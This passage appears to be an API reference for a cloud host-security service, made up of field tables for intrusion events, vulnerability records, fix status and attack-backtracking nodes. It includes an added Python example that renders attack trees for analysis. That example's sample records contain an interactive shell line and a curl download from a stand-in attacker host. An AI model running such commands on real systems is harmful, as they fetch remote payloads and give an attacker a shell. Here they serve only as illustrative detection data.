Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
Id | Integer | Log ID |
Uuid | String | Client ID |
SrcIp | String | Source IP |
SrcPort | Integer | Source port |
HttpMethod | String | Attack method |
VulType | String | Threat type |
CreatedTime | String | Attack time |
DstPort | Integer | Target port |
Quuid | String | Host quuid |
DstIp | String | Target IP |
Visualized emergency notification on the large screen
Used by actions: DescribeScreenEmergentMsg.
Name | Type | Description |
---|---|---|
Title | String | Notification tag/title |
Text | String | Notification content |
Type | Integer | Redirection type: 0=vulnerability management |
Intrusion detection statistics
Used by actions: DescribeScreenEventsCnt.
Name | Type | Description |
---|---|---|
Title | String | Displayed content: Total number of pending risks and total number of affected assets |
Total | Integer | Total number of events |
Category | Array of ScreenNameValue | Name: specific type of the displayed content, including attack event, potential risk, compromised asset, and potentially risky asset. Value: event count after statistics |
Details of large screen intrusion event
Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
CreatedTime | String | Intrusion time |
EventType | Integer | Event type. 0: virus scanning; 1: abnormal log-in; 2: password cracking; 3: malicious request; 4: high-risk command; 5: local privilege escalation; 6: reverse shell. |
Content | String | JSON file of the event data, which varies by event. [Virus scanning] Virus name: VirusName, file name: FileName, file path: FilePath, file size: FileSize, file MD5: MD5, first detection time: CreateTime, last detection time: LatestScanTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme. [Abnormal log-in] Source IP: SrcIp, location: Location, log-in username: UserName, log-in time: LoginTime. [Password cracking] Source IP: SrcIp, location: City and Country, protocol: Protocol, log-in username: UserName, port: Port, attempt count: Count, first attack time: CreateTime, last attack time: ModifyTime. [Malicious request] Malicious request domain name: Url, process: ProcessName, MD5: ProcessMd5, PID: Pid, request count: AccessCount, last request time: MergeTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme. [High-risk command] Hit rule name: RuleName, rule category: RuleCategory, command content: BashCmd, data source: DetectBy, log-in user: User, PID: Pid, occurrence time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme. [Local privilege escalation] Privilege escalation user: UserName, parent process: ParentProcName, user of parent process: ParentProcGroup, detection time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme. [Reverse shell] Connected process: ProcessName, executed command: CmdLine, parent process: ParentProcName, target host: DstIp, target port: DstPort, detection time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme. |
Level | Integer | Unified event risk level. 0: prompt; 1: low; 2: medium; 3: high; 4: critical. |
LevelZh | String | Level in Chinese |
Id | Integer | Event ID |
Uuid | String | Host UUID |
Data of listed hosts on the large screen
Used by actions: DescribeScreenMachines.
Name | Type | Description |
---|---|---|
MachineName | String | Host name. |
MachineOs | String | Host System. |
Uuid | String | Yunjing client UUID. If the client is offline for a long time, an empty string is returned. |
MachineStatus | Integer | Status of a host on the large screen. 0: agent not installed; 1: offline; 2: offline - risky; 3: offline - critical; 4: device installed - normal; 5: device installed - normal and of either Pro Edition or Ultimate Edition; 6: device installed - risky (network attack events > 0); 7: device installed - risky (network attack events > 0) and of either Pro Edition or Ultimate Edition; 8: device installed - critical (intrusion detection events > 0); 9: device installed - critical (intrusion detection events > 0) and of either Pro Edition or Ultimate Edition |
Quuid | String | CVM or BM Machine Unique UUID. |
VulNum | Integer | Number of vulnerabilities |
MachineIp | String | Host IP. |
MachineWanIp | String | Public IP address of the host |
BaselineNum | Integer | Number of baseline risks |
CyberAttackNum | Integer | Number of network risks |
SecurityStatus | String | Risk status |
InvasionNum | Integer | Number of intrusion events |
MachineType | String | Machine zone type. CVM: Cloud Virtual Machine; BM: Bare Metal; ECM: Edge Computing Machine; LH: Lightweight Application Server; Other: Hybrid Cloud Zone |
CpuLoad | String | CPU load status |
CpuSize | Float | Number of CPU cores |
DiskLoad | String | Hard disk utilization (%) |
DiskSize | Float | Hard disk capacity (GB) |
MemLoad | String | Memory utilization (%) |
MemSize | Float | Memory capacity (GB) |
CoreVersion | String | Kernel version |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
[Cloud security alarm] Name/value data visualized on the large screen
Used by actions: DescribeScreenEventsCnt, DescribeScreenGeneralStat, DescribeScreenRiskAssetsTop.
Name | Type | Description |
---|---|---|
Name | String | Statistics type: Different APIs correspond to different content |
Value | Integer | Statistics quantity |
Visualized attack and defense status on large screen
Used by actions: DescribeScreenProtectionStat.
Name | Type | Description |
---|---|---|
Name | String | Type value: virus scanning, brute force cracking, vulnerability scan, baseline check |
Status | Integer | Virus scanning: 0: never scanned or asset not paid; 1: scanned and malicious files found; 2: scanned but isolation protection disabled; 3: scanned, protection enabled, and no risk found. Brute force cracking: 0: protection disabled (asset not paid); 1: automatic blocking enabled. Vulnerability scan: 0: never scanned or asset not paid; 1: vulnerability found; 2: no risk found. Baseline check: 0: never checked or asset not paid; 1: baseline risks found; 2: no risk found. |
CWPP security trend data
Used by actions: DescribeScreenProtectionCnt.
Name | Type | Description |
---|---|---|
Type | String | cloud: Cloud Security Engine; detect: detection engine; defend: attack defense; threat: threat intelligence; analysis: abnormal analysis; ai: AI engine |
Name | String | cloud: Cloud Security Engine; detect: detection engine; defend: attack defense; threat: threat intelligence; analysis: abnormal analysis; ai: AI engine |
Count | Integer | Total number |
Region information
Used by actions: DescribeScreenMachineRegions.
Name | Type | Description |
---|---|---|
Region | String | Region identifiers, such as ap-guangzhou, ap-shanghai, and ap-beijing |
RegionName | String | Chinese name of region, such as South China (Guangzhou), East China (Shanghai Finance), and North China (Beijing) |
RegionId | Integer | Region ID |
RegionCode | String | Region code, such as gz, sh, and bj |
RegionNameEn | String | English name of the region |
3D image of the host on the large screen
Used by actions: DescribeScreenMachines.
Name | Type | Description |
---|---|---|
Region | String | All regions |
RegionName | String | Region description in Chinese |
Machines | Array of ScreenMachine | Host list |
TotalCount | Integer | Total number of hosts in this region |
RiskCnt | Integer | Number of risky hosts |
AttackCnt | Integer | Number of potentially risky hosts |
SafetyCnt | Integer | Number of risk-free hosts |
UnAgentOfflineCnt | Integer | Number of hosts in offline/uninstalled status |
IgnoreCnt | Integer | Number of hosts that are omitted from displaying. When it is equal to 0, no hosts are omitted. |
Attack and defense trend chart on the large screen
Used by actions: DescribeScreenDefenseTrends.
Name | Type | Description |
---|---|---|
X | String | Time on the X-axis |
Y | Integer | Numerical value on the Y-axis |
Type | String | Statistical type: defense count, attack count |
Vulnerability list on the large screen
Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
Id | Integer | Vulnerability Event ID |
Name | String | Vulnerability name |
VulId | Integer | Vulnerability ID |
LastTime | String | Last detection Time |
Level | Integer | Vulnerability level 1: low-risk; 2: medium-risk; 3: high-risk; 4: prompt |
Category | Integer | Vulnerability type: 1 - web-cms vulnerabilities; 2 - application vulnerabilities; 4 - Linux software vulnerabilities; 5 - Windows system vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
Quick search template
Used by actions: CreateSearchTemplate, DescribeSearchTemplates.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name for search |
LogType | String | Yes | Index type for search |
Condition | String | Yes | Statement for search |
TimeRange | String | Yes | Time range |
Query | String | Yes | Converted search statement content |
Flag | String | Yes | Search method. Input box: standard filtering. Search: simple. |
DisplayData | String | Yes | Displayed data |
Id | Integer | No | Rule ID |
List of security manager information
Used by actions: DescribeExpertServiceList.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
OrderId | Integer | Order ID |
Quuid | String | CVM ID |
Status | Integer | Service status. 0: in service; 1: expired; 2: terminated. |
StartTime | String | Service start time |
EndTime | String | Service end time |
HostName | String | Host name |
HostIp | String | Host IP address |
Uuid | String | Host UUID |
RiskCount | Integer | Number of host risks |
Security event message data
Used by actions: DescribeSecurityDynamics.
Name | Type | Description |
---|---|---|
Uuid | String | CWPP client UUID |
EventTime | Timestamp | Security event occurrence time |
EventType | String | Security event type |
Message | String | Security event message |
SecurityLevel | String | Security event level |
List of security event statistics
Used by actions: DescribeSecurityEventsCnt.
Name | Type | Description |
---|---|---|
EventCnt | Integer | Number of security events |
UuidCnt | Integer | Number of affected machines |
Security trend statistics
Used by actions: DescribeSecurityTrends.
Name | Type | Description |
---|---|---|
Date | Date | Event time |
EventNum | Integer | Number of events |
Blocking configuration in the standard mode
Used by actions: DescribeBanMode.
Name | Type | Description |
---|---|---|
Ttl | Integer | Blocking duration (unit: second) |
Baseline security user policy information
Used by actions: DescribeBaselineStrategyList.
Name | Type | Description |
---|---|---|
StrategyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
StrategyId | Integer | Policy ID Note: This field may return null, indicating that no valid values can be obtained. |
RuleCount | Integer | Total number of baseline detection items Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of Hosts Note: This field may return null, indicating that no valid values can be obtained. |
ScanCycle | Integer | Scan cycle Note: This field may return null, indicating that no valid values can be obtained. |
ScanAt | String | Scan time Note: This field may return null, indicating that no valid values can be obtained. |
Enabled | Integer | Whether the policy is enabled Note: This field may return null, indicating that no valid values can be obtained. |
PassRate | Integer | Pass rate Note: This field may return null, indicating that no valid values can be obtained. |
CategoryIds | String | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
IsDefault | Integer | Whether this is a default policy Note: This field may return null, indicating that no valid values can be obtained. |
Tag information
Used by actions: DescribeRansomDefenseMachineList, DescribeRansomDefenseStrategyMachines, DescribeTags.
Name | Type | Description |
---|---|---|
Id | Integer | Tag ID |
Name | String | Tag name |
Count | Integer | Number of servers |
Information on tag-related servers
Used by actions: DescribeTagMachines.
Name | Type | Description |
---|---|---|
Id | String | ID |
Quuid | String | Host ID |
MachineName | String | Host name |
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
MachineRegion | String | Host region |
MachineType | String | Host region type |
Platform tag
Used by actions: CreateLicenseOrder, DescribeHostInfo, DescribeLicenseList, DescribeMachines, DescribeMachinesSimple, DescribeVulEffectHostList, ExportLicenseDetail.
Name | Type | Required | Description |
---|---|---|---|
TagKey | String | Yes | Tag key |
TagValue | String | Yes | Tag value |
Scan status list
Used by actions: DescribeScanTaskStatus.
Name | Type | Description |
---|---|---|
Scanning | String | Scanning (including initializing) |
Ok | String | Scan terminated (including terminating) |
Fail | String | Scan failed |
Stop | String | Scan failed, with specific reason displayed: scan timeout, low client version, or client offline Note: This field may return null, indicating that no valid values can be obtained. |
Statistics data of top network attacks
Used by actions: DescribeAttackTop.
Name | Type | Description |
---|---|---|
Value | String | Top statistical data, such as IP, and vulnerability name |
Count | Integer | Top statistical count |
Edit allowlisted entities
Used by actions: ModifyLoginWhiteInfo.
Name | Type | Required | Description |
---|---|---|---|
Places | Array of Place | Yes | Region information array |
SrcIp | String | Yes | Source IP |
UserName | String | Yes | Username |
Remark | String | Yes | Remarks |
Id | Integer | Yes | Data ID to be updated |
StartTime | String | No | Start time |
EndTime | String | No | End time |
Frequently used log-in location
Used by actions: DescribeUsualLoginPlaces.
Name | Type | Description |
---|---|---|
Id | Integer | ID |
Uuid | String | CWPP client UUID |
CountryId | Integer | Country ID |
ProvinceId | Integer | Province ID |
CityId | Integer | City ID |
Index value description
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
Tokenizer | String | Field delimiter |
Type | String | Field type |
SqlFlag | Boolean | Whether the analysis feature is enabled for the field |
ContainZH | Boolean | Whether Chinese characters are contained |
Allowlist configuration of the authorized edition
Used by actions: DescribeLicenseWhiteConfig.
Name | Type | Description |
---|---|---|
Deadline | Integer | Number of days before expiration |
LicenseNum | Integer | Number of authorizations |
IsApplyFor | Boolean | Whether application can be made |
SourceType | Integer | Type |
Detailed node information
Used by actions: DescribeVertexDetail.
Name | Type | Description |
---|---|---|
Type | Integer | Node type. 1: process; 2: network; 3: file; 4: SSH Note: This field may return null, indicating that no valid values can be obtained. |
Time | String | Time used for each node type, which is in the format of 2022-11-29 00:00:00. Note: This field may return null, indicating that no valid values can be obtained. |
AlarmInfo | Array of AlarmInfo | Alarm information Note: This field may return null, indicating that no valid values can be obtained. |
ProcName | String | Process name, which is effective when the node type is process. Note: This field may return null, indicating that no valid values can be obtained. |
CmdLine | String | Command line, which is effective when the node type is process. Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID, which is effective when the node type is process. Note: This field may return null, indicating that no valid values can be obtained. |
FileMd5 | String | File MD5, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
FileContent | String | Content written to the file, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
FilePath | String | File path, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
FileCreateTime | String | File creation time, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
Address | String | Request destination address, which is effective when the node type is network. Note: This field may return null, indicating that no valid values can be obtained. |
DstPort | Integer | Target port, which is effective when the node type is network. Note: This field may return null, indicating that no valid values can be obtained. |
SrcIP | String | Log-in source IP, which is effective when the node type is SSH. Note: This field may return null, indicating that no valid values can be obtained. |
User | String | Log-in username and user group, which is effective when the node type is SSH. Note: This field may return null, indicating that no valid values can be obtained. |
VulName | String | Vulnerability name, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
VulTime | String | Vulnerability exploitation time, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
HttpContent | String | HTTP request content, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
VulSrcIP | String | Vulnerability exploiter source IP, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
VertexId | String | Node ID Note: This field may return null, indicating that no valid values can be obtained. |
Attack backtracking node information
Used by actions: DescribeAlarmIncidentNodes.
Name | Type | Description |
---|---|---|
Type | Integer | Node type. 1: process; 2: network; 3: file; 4: SSH |
Vid | String | VID contained in this node |
ParentVid | String | Parent node VID of this node |
IsLeaf | Boolean | Whether this node is a leaf node |
ProcNamePrefix | String | Process name, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
ProcNameMd5 | String | Process name MD5, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
CmdLinePrefix | String | Command line, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
CmdLineMd5 | String | Command line MD5, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
FilePathPrefix | String | File path, used when Type=3 Note: This field may return null, indicating that no valid values can be obtained. |
AddressPrefix | String | Request destination address, used when Type=2 Note: This field may return null, indicating that no valid values can be obtained. |
IsWeDetect | Boolean | Whether this node is a vulnerability node |
IsAlarm | Boolean | Whether this node is an alarm node |
FilePathMd5 | String | File path MD5, used when Type=3 Note: This field may return null, indicating that no valid values can be obtained. |
AddressMd5 | String | Request destination address MD5, used when Type=2 Note: This field may return null, indicating that no valid values can be obtained. |
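An added example (not part of this API reference or of any SDK): rebuilding the backtracking tree from a list of records shaped like the table above by linking `Vid` to `ParentVid`, then listing the chain from the root to each alarm node. The sample records, the `Vid` values, and the rule that a root has an empty, null, or unknown `ParentVid` are assumptions.

```python
"""Rebuild an attack-backtracking tree from node records (illustrative only)."""
from collections import defaultdict

NODE_TYPES = {1: "process", 2: "network", 3: "file", 4: "ssh"}
# Type-specific display fields from the table above; none is documented for Type=4.
LABEL_FIELDS = {
    1: ("ProcNamePrefix", "CmdLinePrefix"),
    2: ("AddressPrefix",),
    3: ("FilePathPrefix",),
}


def node_label(node):
    """One-line description of a node; null or absent fields are skipped."""
    kind = NODE_TYPES.get(node.get("Type"), "unknown")
    parts = [node[f] for f in LABEL_FIELDS.get(node.get("Type"), ()) if node.get(f)]
    flags = [name for key, name in (("IsAlarm", "ALARM"), ("IsWeDetect", "VULN"))
             if node.get(key)]
    text = f"{kind}: {' | '.join(parts) or node['Vid']}"
    return text + (f" [{','.join(flags)}]" if flags else "")


def build_tree(nodes):
    """Return (by_vid, children, roots, problems) for a flat node list."""
    by_vid, problems = {}, []
    for n in nodes:
        if n["Vid"] in by_vid:
            problems.append(f"duplicate Vid {n['Vid']}")
            continue
        by_vid[n["Vid"]] = n
    children, roots = defaultdict(list), []
    for vid, n in by_vid.items():
        parent = n.get("ParentVid")
        # Assumption: a root has an empty/null ParentVid or a parent not in this result.
        if parent and parent in by_vid and parent != vid:
            children[parent].append(vid)
        else:
            roots.append(vid)
    for vid, n in by_vid.items():
        if n.get("IsLeaf") and children.get(vid):
            problems.append(f"{vid} is flagged IsLeaf but has children")
    return by_vid, children, roots, problems


def render(nodes):
    """Return (indented lines in depth-first order, list of data problems)."""
    by_vid, children, roots, problems = build_tree(nodes)
    lines, seen = [], set()
    stack = [(r, 0) for r in reversed(roots)]
    while stack:
        vid, depth = stack.pop()
        if vid in seen:
            continue
        seen.add(vid)
        lines.append("  " * depth + node_label(by_vid[vid]))
        stack.extend((c, depth + 1) for c in reversed(children.get(vid, [])))
    # Nodes never reached from a root sit on a ParentVid cycle.
    for vid in sorted(by_vid.keys() - seen):
        problems.append(f"{vid} is unreachable from any root (ParentVid cycle)")
    return lines, problems


def alarm_chains(nodes):
    """For each alarm node, the list of Vids from the root down to that node."""
    by_vid = build_tree(nodes)[0]
    chains = []
    for vid, n in by_vid.items():
        if not n.get("IsAlarm"):
            continue
        chain, cur = [], vid
        while cur in by_vid and cur not in chain:  # second test guards against cycles
            chain.append(cur)
            cur = by_vid[cur].get("ParentVid")
        chains.append(list(reversed(chain)))
    return chains


# Constructed sample records; field names follow the table, values are made up.
SAMPLE_NODES = [
    {"Type": 4, "Vid": "v1", "ParentVid": "", "IsLeaf": False,
     "IsWeDetect": False, "IsAlarm": False},
    {"Type": 1, "Vid": "v2", "ParentVid": "v1", "IsLeaf": False,
     "ProcNamePrefix": "bash", "CmdLinePrefix": "bash -i",
     "IsWeDetect": False, "IsAlarm": False},
    {"Type": 1, "Vid": "v3", "ParentVid": "v2", "IsLeaf": False,
     "ProcNamePrefix": "curl", "CmdLinePrefix": "curl -o /tmp/x http://198.51.100.7/x",
     "IsWeDetect": False, "IsAlarm": True},
    {"Type": 3, "Vid": "v4", "ParentVid": "v3", "IsLeaf": True,
     "FilePathPrefix": "/tmp/x", "IsWeDetect": False, "IsAlarm": False},
    {"Type": 2, "Vid": "v5", "ParentVid": "v3", "IsLeaf": True,
     "AddressPrefix": "198.51.100.7:80", "CmdLinePrefix": None,
     "IsWeDetect": False, "IsAlarm": False},
]

if __name__ == "__main__":
    tree_lines, issues = render(SAMPLE_NODES)
    print("\n".join(tree_lines))
    print("alarm chains:", alarm_chains(SAMPLE_NODES))
    print("problems:", issues)
```

The `*Md5` fields are not needed to build the tree, so the example leaves them out.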
Vulnerability details
Used by actions: DescribeVulDefenceEvent.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
VulName | String | Vulnerability name |
CveId | String | CVE ID |
Id | Integer | Vulnerability event ID |
Quuid | String | Host QUUID |
Alias | String | Host name |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP address |
EventType | Integer | 0: Attack Attempt (WeDetect); 1: Successful Attack Attempt (WeDetect); 2: RASP Defense Event |
SourceIp | String | Attack source IP address |
City | String | City of the attack source IP address |
SourcePort | Array of Integer | Attack source port |
CreateTime | String | Event Creation Time |
MergeTime | String | Update Event Time |
Count | Integer | Number of Occurrences |
Status | Integer | Status. 0: Pending; 1: Defended; 2: Processed; 3: Ignored; 4: Deleted |
UpgradeType | Integer | 0: Pro Edition; 1: Ultimate Edition; 2: LH Inclusive Edition (for Lighthouse only); 3: CVM Inclusive Edition (for CVM only). |
FixType | Integer | 0: do not support fixing; 1: support fixing. |
Uuid | String | Host UUID |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability details
Used by actions: DescribeDefenceEventDetail.
Name | Type | Description |
---|---|---|
VulName | String | Vulnerability name |
CveId | String | CVE ID |
Id | Integer | Vulnerability Event ID |
Quuid | String | Host QUUID |
Alias | String | Host name |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP address |
EventType | Integer | 0: Attack Attempt (WeDetect); 1: Successful Attack Attempt (WeDetect); 2: RASP Defense Event |
SourceIp | String | Attack source IP address |
City | String | City of the attack source IP address |
SourcePort | Array of Integer | Attack source port Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Event Creation Time |
MergeTime | String | Update Event Time |
Count | Integer | Number of Occurrences |
Status | Integer | Status. 0: Pending; 1: Defended; 2: Processed; 3: Ignored; 4: Deleted |
MachineStatus | String | Host status: ONLINE or OFFLINE |
Description | String | Vulnerability Description Information |
Fix | String | Fixing suggestion |
NetworkPayload | String | Attack Payload |
Pid | Integer | Associated Process PID |
MainClass | String | Associated Process Main Class Name |
StackTrace | String | Stack Information (Unique for RASP) |
EventDetail | String | Vulnerability ID-Related Event Details (JSON array format, unique to RASP) |
ExceptionPstree | String | Host Compromise Event Process Tree (JSON format, unique to WeDetect) |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability defense trend page, which includes plugin status and attack defense trends. The trends are stored in three arrays of equal length whose elements correspond one-to-one. If a day is missed, its data is missing.
Used by actions: DescribeVulDefenceOverview.
Name | Type | Description |
---|---|---|
Enable | Integer | Defense switch: 0 - disable; 1 - enable |
DefendHostCount | Integer | Number of hosts with defense enabled |
ExceptionCount | Integer | Number of plugin exceptions |
AttackCounts | Array of Integer | Daily attack trends Note: This field may return null, indicating that no valid values can be obtained. |
DefendCounts | Array of Integer | Daily defense trends Note: This field may return null, indicating that no valid values can be obtained. |
Date | Array of String | Date Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability defense plugin status of a single process
Used by actions: DescribeVulDefencePluginDetail.
Name | Type | Description |
---|---|---|
Pid | Integer | ID of the injected process |
MainClass | String | Main class name of the injected process |
Status | Integer | Plugin status. 0: injecting; 1: injection successful; 2: plugin timed out; 3: plugin exited; 4: injection failed; 5: logically deleted. |
ErrorLog | String | Error log |
InjectLog | String | Injection log |
Host vulnerability defense plugin information
Used by actions: DescribeVulDefencePluginStatus.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID |
Alias | String | Host alias |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP address |
Exception | Integer | Plugin status: 0 - normal; 1 - abnormal |
CreateTime | String | Creation time |
ModifyTime | String | Last update time |
Vulnerability defense scope details
Used by actions: DescribeVulDefenceList.
Name | Type | Description |
---|---|---|
VulName | String | Vulnerability name |
Label | String | Tag |
Level | Integer | Vulnerability level. 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical. |
CvssScore | Float | CVSS score |
CveId | String | CVE ID |
PublishTime | String | Release time |
VulId | Integer | Vulnerability ID |
Vulnerability details
Used by actions: DescribeScanTaskDetails.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
Level | Integer | Vulnerability level |
Name | String | Vulnerability name |
CveId | String | CVE ID |
VulCategory | Integer | 1: web-cms vulnerabilities; 2: application vulnerabilities; 4: Linux software vulnerabilities; 5: Windows system vulnerabilities; 0: emergency vulnerabilities |
Descript | String | Vulnerability description |
Fix | String | Fixing suggestion |
Reference | String | Reference link |
CvssScore | Float | CVSS score |
Cvss | String | CVSS details |
PublishTime | String | Release time |
List of hosts affected by vulnerabilities
Used by actions: DescribeVulEffectHostList.
Name | Type | Description |
---|---|---|
EventId | Integer | Event ID Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Status. 0: pending; 1: ignored; 3: fixed; 5: detecting; 6: fixing; 7: rolling back; 8: fixing failed. Note: This field may return null, indicating that no valid values can be obtained. |
LastTime | String | Last detection time Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
AliasName | String | Host alias Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Description | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
HostVersion | Integer | Edition information. 0: Basic Edition; 1: Pro Edition; 2: Ultimate Edition; 3: Inclusive Edition. Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportAutoFix | Integer | Whether automatic fixing is supported. 0: not supported; 1: supported; 2: client offline; 3: manual fixing supported for Ultimate Edition hosts; 4: not supported for this model; 5: fixing; 6: fixed; 7: detecting; 9: fixing failed; 10: ignored; 11: supported for Linux but not Windows; 12: supported for Windows but not Linux; 13: fixing failed but host is offline; 14: fixing failed but host is not of the Ultimate edition; 15: manually fixed. Note: This field may return null, indicating that no valid values can be obtained. |
FixStatusMsg | String | Failure cause Note: This field may return null, indicating that no valid values can be obtained. |
FirstDiscoveryTime | String | First detection time Note: This field may return null, indicating that no valid values can be obtained. |
InstanceState | String | Instance status. "PENDING": creating; "LAUNCH_FAILED": creation failed; "RUNNING": running; "STOPPED": shut down; "STARTING": starting; "STOPPING": shutting down; "REBOOTING": restarting; "SHUTDOWN": shut down and pending termination; "TERMINATING": terminating. Note: This field may return null, indicating that no valid values can be obtained. |
PublicIpAddresses | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tags | Cloud tag information Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host additional information Note: This field may return null, indicating that no valid values can be obtained. |
Details of components affected by vulnerabilities
Used by actions: DescribeVulEffectModules.
Name | Type | Description |
---|---|---|
Name | String | Component name |
Uuids | Array of String | Affected host uuid |
Rule | String | Affected component version |
Path | String | Component path |
Version | String | Component version |
FixCmd | String | Fix Command |
Quuids | Array of String | Affected host quuid |
Emergency notification entity
Used by actions: DescribeVulEmergentMsg.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
PublishTime | String | Vulnerability publish time |
Name | String | Vulnerability name |
View the fixing status of each vulnerability on each host.
Used by actions: DescribeVulFixStatus.
Name | Type | Description |
---|---|---|
HostName | String | Host name |
HostIp | String | Host IP |
Quuid | String | Host QUUID |
Status | Integer | Status. 0: initial status; 1: task issued (fixing); 2: completed (successful); 3: fixing failed (failed); 4: fixing failed due to snapshot creation failure (unfixed). |
ModifyTime | String | Fixing time |
FailReason | String | Fixing failure cause Note: This field may return null, indicating that no valid values can be obtained. |
View vulnerability fixing details
Used by actions: DescribeVulFixStatus.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID Note: This field may return null, indicating that no valid values can be obtained. |
VulName | String | Vulnerability name Note: This field may return null, indicating that no valid values can be obtained. |
Progress | Integer | Vulnerability fixing progress: 1-100; |
HostList | Array of VulFixStatusHostInfo | Vulnerability fixing status for corresponding hosts Note: This field may return null, indicating that no valid values can be obtained. |
FailCnt | Integer | Number of hosts with failed vulnerability fixing Note: This field may return null, indicating that no valid values can be obtained. |
FixSuccessCnt | Integer | Number of hosts with successful vulnerability fixing Note: This field may return null, indicating that no valid values can be obtained. |
FixMethod | Integer |
Machine snapshot information
Used by actions: DescribeVulFixStatus.
Name | Type | Description |
---|---|---|
Quuid | String | CVM ID |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
SnapshotName | String | Snapshot name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Snapshot creation time Note: This field may return null, indicating that no valid values can be obtained. |
SnapshotId | String | Snapshot ID Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Unique record ID |
Status | Integer | Snapshot status. 0: initial; 1: created successfully; 2: creation failed. |
FailReason | String | Snapshot creation failure reason Note: This field may return null, indicating that no valid values can be obtained. |
Top 5 server risk entities
Used by actions: DescribeVulHostTop.
Name | Type | Description |
---|---|---|
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
VulLevelList | Array of VulLevelCountInfo | Vulnerability level and quantity statistics list Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Score | Integer | Top ratings Note: This field may return null, indicating that no valid values can be obtained. |
Query vulnerability details by cve_id
Used by actions: DescribeVulCveIdInfo.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
FixSwitch | Integer | Fix support status. 0: neither Windows nor Linux supports fixing; 1: both Windows and Linux support fixing; 2: only Linux supports fixing; 3: only Windows supports fixing. |
Second pop-up window for batch vulnerability fixing
Used by actions: DescribeCanFixVulMachine.
Name | Type | Description |
---|---|---|
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportAutoFix | Integer | 0 - the vulnerability cannot be fixed automatically; 1 - the vulnerability can be fixed automatically; 2 - the client has been offline; 3 - the host is not the ultimate edition and can only be fixed manually; 4 - the model does not allow automatic fix; 5 - fixing; 6 - fixed; 7 - under detection; 9 - fix failed; 10 - ignored; 11 - the vulnerability is supported only on Linux, not on Windows; 12 - the vulnerability is supported only on Windows, not on Linux. Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Host InstanceId Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability list on the vulnerability management page of CWPP
Used by actions: DescribeVulList.
